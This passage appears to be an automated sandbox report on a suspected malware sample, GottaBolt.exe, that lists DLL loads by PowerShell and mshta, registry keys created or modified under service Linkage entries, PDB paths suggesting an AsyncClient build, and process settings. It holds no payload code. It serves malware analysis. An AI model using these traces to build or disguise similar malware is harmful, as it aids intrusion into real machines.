Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\GottaBolt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: GottaBolt.exe

Static PE information: certificate valid

Source: GottaBolt.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: GottaBolt.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: GottaBolt.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: GottaBolt.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\user\Desktop\NEW-ExpX\AsyncClientNew\AsyncClient\obj\Release\DulidKolmen.pdb source: powershell.exe, 00000008.00000002.4206767598.000001E8F5FB7000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe

Source: GottaBolt.exe

Static PE information: 0x9557AA46 [Tue May 25 10:13:26 2049 UTC]

Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F1C551 push ss; iretd	0_2_00007FF848F1C73F
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F1B4A9 push ebx; ret	0_2_00007FF848F1B4AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848E1D2A5 pushad ; iretd	4_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F322F5 push eax; iretd	8_2_00007FF848F3233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F30E10 push eax; retf	8_2_00007FF848F30E1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F320CC push eax; iretd	8_2_00007FF848F3233D

Source: C:\Users\user\Desktop\GottaBolt.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\Linkage

Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\Linkage

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
